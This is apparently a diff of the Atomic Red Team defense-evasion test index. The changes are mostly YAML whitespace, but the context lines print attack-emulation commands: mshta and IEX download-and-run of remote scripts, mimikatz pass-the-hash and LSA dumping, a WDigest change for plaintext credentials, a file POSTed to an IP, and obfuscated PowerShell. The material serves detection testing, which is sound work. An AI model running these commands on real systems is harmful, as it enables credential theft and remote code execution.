           Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -27615,7 +27615,7 @@ defense-evasion:
       description: 'Changes a file or folder''s permissions using chmod and a specified
         numeric mode.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -27631,14 +27631,14 @@ defense-evasion:
       executor:
         command: 'chmod #{numeric_mode} #{file_or_folder}
 
-'
+          '
         name: bash
     - name: chmod - Change file or folder mode (symbolic mode)
       auto_generated_guid: fc9d6695-d022-4a80-91b1-381f5c35aff3
       description: 'Changes a file or folder''s permissions using chmod and a specified
         symbolic mode.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -27654,14 +27654,14 @@ defense-evasion:
       executor:
         command: 'chmod #{symbolic_mode} #{file_or_folder}
 
-'
+          '
         name: bash
     - name: chmod - Change file or folder mode (numeric mode) recursively
       auto_generated_guid: ea79f937-4a4d-4348-ace6-9916aec453a4
       description: 'Changes a file or folder''s permissions recursively using chmod
         and a specified numeric mode.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -27677,14 +27677,14 @@ defense-evasion:
       executor:
         command: 'chmod -R #{numeric_mode} #{file_or_folder}
 
-'
+          '
         name: bash
     - name: chmod - Change file or folder mode (symbolic mode) recursively
       auto_generated_guid: 0451125c-b5f6-488f-993b-5a32b09f7d8f
       description: 'Changes a file or folder''s permissions recursively using chmod
         and a specified symbolic mode.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -27700,14 +27700,14 @@ defense-evasion:
       executor:
         command: 'chmod -R #{symbolic_mode} #{file_or_folder}
 
-'
+          '
         name: bash
     - name: chown - Change file or folder ownership and group
       auto_generated_guid: d169e71b-85f9-44ec-8343-27093ff3dfc0
       description: 'Changes a file or folder''s ownership and group information using
         chown.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -27727,14 +27727,14 @@ defense-evasion:
       executor:
         command: 'chown #{owner}:#{group} #{file_or_folder}
 
-'
+          '
         name: bash
     - name: chown - Change file or folder ownership and group recursively
       auto_generated_guid: b78598be-ff39-448f-a463-adbf2a5b7848
       description: 'Changes a file or folder''s ownership and group information recursively
         using chown.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -27754,13 +27754,13 @@ defense-evasion:
       executor:
         command: 'chown -R #{owner}:#{group} #{file_or_folder}
 
-'
+          '
         name: bash
     - name: chown - Change file or folder mode ownership only
       auto_generated_guid: 967ba79d-f184-4e0e-8d09-6362b3162e99
       description: 'Changes a file or folder''s ownership only using chown.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -27776,13 +27776,13 @@ defense-evasion:
       executor:
         command: 'chown #{owner} #{file_or_folder}
 
-'
+          '
         name: bash
     - name: chown - Change file or folder ownership recursively
       auto_generated_guid: 3b015515-b3d8-44e9-b8cd-6fa84faf30b2
       description: 'Changes a file or folder''s ownership only recursively using chown.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -27798,7 +27798,7 @@ defense-evasion:
       executor:
         command: 'chown -R #{owner} #{file_or_folder}
 
-'
+          '
         name: bash
     - name: chattr - Remove immutable file attribute
       auto_generated_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f
@@ -27816,7 +27816,7 @@ defense-evasion:
       executor:
         command: 'chattr -i #{file_to_modify}
 
-'
+          '
         name: sh
   T1078.003:
     technique:
@@ -27940,7 +27940,7 @@ defense-evasion:
         C# project example file (T1127.001.csproj) will simply print "Hello From a
         Code Fragment" and "Hello From a Class." to the screen.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -27960,10 +27960,10 @@ defense-evasion:
       dependencies:
       - description: 'Project file must exist on disk at specified location (#{filename})
 
-'
+          '
         prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/T1127.001.csproj" -OutFile "#{filename}"
@@ -27976,7 +27976,7 @@ defense-evasion:
         Visual Basic example file (vb.xml) will simply print "Hello from a Visual
         Basic inline task!" to the screen.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -27996,10 +27996,10 @@ defense-evasion:
       dependencies:
       - description: 'Project file must exist on disk at specified location (#{filename})
 
-'
+          '
         prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/vb.xml" -OutFile "#{filename}"
@@ -28122,7 +28122,7 @@ defense-evasion:
         Red Team repo, and mount the image. The provided sample ISO simply has a Reports
         shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -28134,20 +28134,20 @@ defense-evasion:
       dependencies:
       - description: 'T1553.005.iso must exist on disk at specified location (#{path_of_iso})
 
-'
+          '
         prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}"
       executor:
         command: 'Mount-DiskImage -ImagePath "#{path_of_iso}"
 
-'
+          '
         cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
 
-'
+          '
         name: powershell
     - name: Mount an ISO image and run executable from the ISO
       auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc
@@ -28169,10 +28169,10 @@ defense-evasion:
       dependencies:
       - description: 'FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso})
 
-'
+          '
         prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}"
@@ -28259,7 +28259,7 @@ defense-evasion:
           schtasks /query /tn win32times
         cleanup_command: 'schtasks /tn win32times /delete /f
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Creating W32Time similar named service using sc
@@ -28274,7 +28274,7 @@ defense-evasion:
           sc qc win32times
         cleanup_command: 'sc delete win32times
 
-'
+          '
         name: command_prompt
         elevation_required: true
   T1036:
@@ -28424,7 +28424,7 @@ defense-evasion:
       description: 'Create and execute a process from a directory masquerading as
         the current parent directory (`...` instead of normal `..`)
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -28673,11 +28673,11 @@ defense-evasion:
         command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
           /t REG_DWORD /v HideFileExt /d 1 /f
 
-'
+          '
         cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
           /v HideFileExt /f >nul 2>&1
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Modify Registry of Local Machine - cmd
@@ -28697,11 +28697,11 @@ defense-evasion:
         command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
           /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f
 
-'
+          '
         cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
           /v SecurityHealth /f >nul 2>&1
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Modify registry to store logon credentials
@@ -28716,11 +28716,11 @@ defense-evasion:
         command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
           /v UseLogonCredential /t REG_DWORD /d 1 /f
 
-'
+          '
         cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
           /v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Add domain to Trusted sites Zone
@@ -28761,11 +28761,11 @@ defense-evasion:
         command: 'New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet
           Settings" -Name T1112 -Value "<script>"
 
-'
+          '
         cleanup_command: 'Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet
           Settings" -Name T1112 -ErrorAction Ignore
 
-'
+          '
         name: powershell
     - name: Change Powershell Execution Policy to Bypass
       auto_generated_guid: f3a6cceb-06c9-48e5-8df8-8867a6814245
@@ -28782,11 +28782,11 @@ defense-evasion:
       executor:
         command: 'Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope LocalMachine
 
-'
+          '
         cleanup_command: 'Set-ExecutionPolicy -ExecutionPolicy #{default_execution_policy}
           -Scope LocalMachine
 
-'
+          '
         name: powershell
   T1601:
     technique:
@@ -28937,7 +28937,7 @@ defense-evasion:
       description: 'Test execution of a remote script using mshta.exe. Upon execution
         calc.exe will be launched.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -28948,7 +28948,7 @@ defense-evasion:
       executor:
         command: 'mshta.exe javascript:a=(GetObject(''script:#{file_url}'')).Exec();close();
 
-'
+          '
         name: command_prompt
     - name: Mshta executes VBScript to execute malicious command
       auto_generated_guid: 906865c3-e05f-4acc-85c4-fbc185455095
@@ -28962,14 +28962,14 @@ defense-evasion:
         command: 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell
           -noexit -file PathToAtomicsFolder\T1218.005\src\powershell.ps1"":close")
 
-'
+          '
         name: command_prompt
     - name: Mshta Executes Remote HTML Application (HTA)
       auto_generated_guid: c4b97eeb-5249-4455-a607-59f95485cb45
       description: 'Execute an arbitrary remote HTA. Upon execution calc.exe will
         be launched.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -28988,7 +28988,7 @@ defense-evasion:
           mshta "#{temp_file}"
         cleanup_command: 'remove-item "#{temp_file}" -ErrorAction Ignore
 
-'
+          '
         name: powershell
     - name: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral
         Movement
@@ -29020,7 +29020,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-'
+          '
       executor:
         command: 'Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine
           #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath
@@ -29051,7 +29051,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-'
+          '
       executor:
         command: 'Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine
           #{script_engine} -SimulateUserDoubleClick'
@@ -29081,7 +29081,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-'
+          '
       executor:
         command: 'Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path}'
         name: powershell
@@ -29115,7 +29115,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-'
+          '
       executor:
         command: 'Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler
           #{protocol_handler} -UseRundll32 -Rundll32FilePath #{rundll32_file_path}'
@@ -29149,7 +29149,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-'
+          '
       executor:
         command: 'Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler
           #{protocol_handler} -MSHTAFilePath #{mshta_file_path}'
@@ -29175,7 +29175,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-'
+          '
       executor:
         command: 'Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath
           #{mshta_file_path}'
@@ -29185,7 +29185,7 @@ defense-evasion:
       description: 'Use Mshta to execute arbitrary PowerShell. Example is from the
         2021 Threat Detection Report by Red Canary.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -29200,7 +29200,7 @@ defense-evasion:
       executor:
         command: 'mshta.exe "about:<hta:application><script language="VBScript">Close(Execute("CreateObject(""Wscript.Shell"").Run%20""powershell.exe%20-nop%20-Command%20Write-Host%20#{message};Start-Sleep%20-Seconds%20#{seconds_to_sleep}"""))</script>''"
 
-'
+          '
         name: command_prompt
   T1218.007:
     technique:
@@ -29267,7 +29267,7 @@ defense-evasion:
       description: 'Execute arbitrary MSI file. Commonly seen in application installation.
         The MSI opens notepad.exe when sucessfully executed.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -29279,17 +29279,17 @@ defense-evasion:
       dependencies:
       - description: 'T1218.msi must exist on disk at specified location (#{msi_payload})
 
-'
+          '
         prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Write-Host "You must provide your own MSI"
 
-'
+          '
       executor:
         command: 'msiexec.exe /q /i "#{msi_payload}"
 
-'
+          '
         name: command_prompt
     - name: Msiexec.exe - Execute Remote MSI file
       auto_generated_guid: bde7d2fe-d049-458d-a362-abda32a7e649
@@ -29297,7 +29297,7 @@ defense-evasion:
         in application installation, commonly seen in malware execution. The MSI opens
         notepad.exe when sucessfully executed.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -29308,7 +29308,7 @@ defense-evasion:
       executor:
         command: 'msiexec.exe /q /i "#{msi_payload}"
 
-'
+          '
         name: command_prompt
     - name: Msiexec.exe - Execute Arbitrary DLL
       auto_generated_guid: 66f64bd5-7c35-4c24-953a-04ca30a0a0ec
@@ -29327,17 +29327,17 @@ defense-evasion:
       dependencies:
       - description: 'T1218.dll must exist on disk at specified location (#{dll_payload})
 
-'
+          '
         prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/x64/T1218.dll" -OutFile "#{dll_payload}"
       executor:
         command: 'msiexec.exe /y "#{dll_payload}"
 
-'
+          '
         name: command_prompt
   T1564.004:
     technique:
@@ -29477,7 +29477,7 @@ defense-evasion:
           Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`""
         cleanup_command: 'Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore
 
-'
+          '
         name: powershell
     - name: Create ADS command prompt
       auto_generated_guid: 17e7637a-ddaf-4a82-8622-377e20de8fdb
@@ -29501,7 +29501,7 @@ defense-evasion:
           for /f "usebackq delims=?" %i in (#{file_name}:#{ads_filename}) do %i
         cleanup_command: 'del #{file_name} >nul 2>&1
 
-'
+          '
         name: command_prompt
     - name: Create ADS PowerShell
       auto_generated_guid: 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1
@@ -29523,13 +29523,13 @@ defense-evasion:
       dependencies:
       - description: 'The file must exist on disk at specified location (#{file_name})
 
-'
+          '
         prereq_command: 'if (Test-Path #{file_name}) { exit 0 } else { exit 1 }
 
-'
+          '
         get_prereq_command: 'New-Item -Path #{file_name} | Out-Null
 
-'
+          '
       executor:
         command: |
           echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test"
@@ -29537,7 +29537,7 @@ defense-evasion:
           set-content -path . -stream #{ads_filename} -value "test3"
         cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore
 
-'
+          '
         name: powershell
   T1599.001:
     technique:
@@ -29746,7 +29746,7 @@ defense-evasion:
       auto_generated_guid: 14c38f32-6509-46d8-ab43-d53e32d2b131
       description: 'Add a Network Share utilizing the command_prompt
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -29763,7 +29763,7 @@ defense-evasion:
       auto_generated_guid: '09210ad5-1ef2-4077-9ad3-7351e13e9222'
       description: 'Removes a Network Share utilizing the command_prompt
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -29774,13 +29774,13 @@ defense-evasion:
       executor:
         command: 'net share #{share_name} /delete
 
-'
+          '
         name: command_prompt
     - name: Remove Network Share PowerShell
       auto_generated_guid: 0512d214-9512-4d22-bde7-f37e058259b3
       description: 'Removes a Network Share utilizing PowerShell
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -29990,14 +29990,14 @@ defense-evasion:
         cleanup_command: 'Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage}
           -Name #{registry_entry_storage}
 
-'
+          '
         name: powershell
     - name: Execution from Compressed File
       auto_generated_guid: f8c8a909-5f29-49ac-9244-413936ce6d1f
       description: 'Mimic execution of compressed executable. When successfully executed,
         calculator.exe will open.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -30009,11 +30009,11 @@ defense-evasion:
       dependencies:
       - description: 'T1027.exe must exist on disk at $env:temp\temp_T1027.zip\T1027.exe
 
-'
+          '
         prereq_command: 'if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0}
           else {exit 1}
 
-'
+          '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "#{url_path}" -OutFile "$env:temp\T1027.zip"
@@ -30021,7 +30021,7 @@ defense-evasion:
       executor:
         command: '"%temp%\temp_T1027.zip\T1027.exe"
 
-'
+          '
         cleanup_command: |
           taskkill /f /im calculator.exe >nul 2>nul
           rmdir /S /Q %temp%\temp_T1027.zip >nul 2>nul
@@ -30055,7 +30055,7 @@ defense-evasion:
         command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject ''T1027_Atomic_Test''
           -Attachments #{input_file} -SmtpServer #{smtp_server}
 
-'
+          '
         name: powershell
     - name: DLP Evasion via Sensitive Data in VBA Macro over HTTP
       auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319
@@ -30076,7 +30076,7 @@ defense-evasion:
       executor:
         command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
 
-'
+          '
         name: powershell
     - name: Obfuscated Command in PowerShell
       auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f
@@ -30084,7 +30084,7 @@ defense-evasion:
         "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report
         by Red Canary.
 
-'
+        '
       supported_platforms:
       - windows
       executor:
@@ -30095,7 +30095,7 @@ defense-evasion:
           120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .(''%'') { (
           [CHAR] (  $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )
 
-'
+          '
         name: powershell
   T1218.008:
     technique:
@@ -30166,7 +30166,7 @@ defense-evasion:
       auto_generated_guid: 2430498b-06c0-4b92-a448-8ad263c388e2
       description: 'Execute arbitrary DLL file stored locally.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -30178,17 +30178,17 @@ defense-evasion:
       dependencies:
       - description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload})
 
-'
+          '
         prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"
       executor:
         command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
 
-'
+          '
         name: command_prompt
   T1134.004:
     technique:
@@ -30301,10 +30301,10 @@ defense-evasion:
       dependencies:
       - description: 'DLL to inject must exist on disk at specified location (#{dll_path})
 
-'
+          '
         prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}"
@@ -30345,7 +30345,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-'
+          '
       executor:
         command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine
           ''#{command_line}'' -ParentId #{parent_pid}'
@@ -30374,7 +30374,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-'
+          '
       executor:
         command: 'Start-ATHProcessUnderSpecificParent  -ParentId #{parent_pid} -TestGuid
           #{test_guid}'
@@ -30404,7 +30404,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-'
+          '
       executor:
         command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine,
           ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" |
@@ -30440,7 +30440,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-'
+          '
       executor:
         command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent
           -FilePath #{file_path} -CommandLine ''#{command_line}'''
@@ -30525,7 +30525,7 @@ defense-evasion:
       - description: 'Mimikatz executor must exist on disk and at specified location
           (#{mimikatz_path})
 
-'
+          '
         prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -30539,13 +30539,13 @@ defense-evasion:
         command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain}
           /ntlm:#{ntlm}"
 
-'
+          '
         name: command_prompt
     - name: crackmapexec Pass the Hash
       auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9
       description: 'command execute with crackmapexec
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -30574,18 +30574,18 @@ defense-evasion:
       - description: 'CrackMapExec executor must exist on disk at specified location
           (#{crackmapexec_exe})
 
-'
+          '
         prereq_command: 'if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 }
 
-'
+          '
         get_prereq_command: 'Write-Host Automated installer not implemented yet, please
           install crackmapexec manually at this location: #{crackmapexec_exe}
 
-'
+          '
       executor:
         command: 'crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command}
 
-'
+          '
         name: command_prompt
   T1550.003:
     technique:
@@ -30664,7 +30664,7 @@ defense-evasion:
       auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098
       description: 'Similar to PTH, but attacking Kerberos
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -30684,10 +30684,10 @@ defense-evasion:
       dependencies:
       - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe})
 
-'
+          '
         prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip"
@@ -30765,7 +30765,7 @@ defense-evasion:
       description: 'Uses PowerShell to install and register a password filter DLL.
         Requires a reboot and administrative privileges.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -30778,14 +30778,14 @@ defense-evasion:
       - description: 'AtomicPasswordFilter.dll must exist on disk at specified location
           (#{input_dll})
 
-'
+          '
         prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Write-Host "You must provide your own password filter
           dll"
 
-'
+          '
       executor:
         command: |
           $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename
@@ -31616,13 +31616,13 @@ defense-evasion:
         cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction
           Ignore
 
-'
+          '
         name: powershell
     - name: RunPE via VBA
       auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
       description: 'This module executes notepad.exe from within the WINWORD.EXE process
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -31634,7 +31634,7 @@ defense-evasion:
       dependencies:
       - description: 'Microsoft #{ms_product} must be installed
 
-'
+          '
         prereq_command: |
           try {
             New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -31645,7 +31645,7 @@ defense-evasion:
         get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
           manually to meet this requirement"
 
-'
+          '
       executor:
         command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
           (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
@@ -31768,7 +31768,7 @@ defense-evasion:
       dependencies:
       - description: 'The 64-bit version of Microsoft Office must be installed
 
-'
+          '
         prereq_command: |
           try {
             $wdApp = New-Object -COMObject "Word.Application"
@@ -31779,7 +31779,7 @@ defense-evasion:
         get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit)
           manually to meet this requirement"
 
-'
+          '
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -31814,7 +31814,7 @@ defense-evasion:
       - description: 'Mimikatz executor must exist on disk and at specified location
           (#{mimikatz_path})
 
-'
+          '
         prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -31828,10 +31828,10 @@ defense-evasion:
       - description: 'PsExec tool from Sysinternals must exist on disk at specified
           location (#{psexec_path})
 
-'
+          '
         prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
 
-'
+          '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
@@ -31842,7 +31842,7 @@ defense-evasion:
         command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa
           /inject /id:500" "exit"
 
-'
+          '
         name: command_prompt
         elevation_required: false
   T1055.008:
@@ -31977,7 +31977,7 @@ defense-evasion:
       description: 'Executes the signed PubPrn.vbs script with options to download
         and execute an arbitrary payload.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -31989,7 +31989,7 @@ defense-evasion:
         command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
           localhost "script:#{remote_payload}"
 
-'
+          '
         name: command_prompt
   T1542.004:
     technique:
@@ -32212,7 +32212,7 @@ defense-evasion:
       description: 'Executes the Uninstall Method, No Admin Rights Required. Upon
         execution, "I shouldn''t really execute either." will be displayed.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -32229,10 +32229,10 @@ defense-evasion:
       - description: 'The CSharp source file must exist on disk at specified location
           (#{source_file})
 
-'
+          '
         prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}"
@@ -32242,7 +32242,7 @@ defense-evasion:
           C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file}
         cleanup_command: 'del #{output_file} >nul 2>&1
 
-'
+          '
         name: command_prompt
     - name: Regsvcs Uninstall Method Call Test
       auto_generated_guid: fd3c1c6a-02d2-4b72-82d9-71c527abb126
@@ -32265,10 +32265,10 @@ defense-evasion:
       - description: 'The CSharp source file must exist on disk at specified location
           (#{source_file})
 
-'
+          '
         prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}"
@@ -32357,7 +32357,7 @@ defense-evasion:
       description: 'Regsvr32.exe is a command-line program used to register and unregister
         OLE controls. Upon execution, calc.exe will be launched.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -32377,10 +32377,10 @@ defense-evasion:
       dependencies:
       - description: 'Regsvr32.sct must exist on disk at specified location (#{filename})
 
-'
+          '
         prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct" -OutFile "#{filename}"
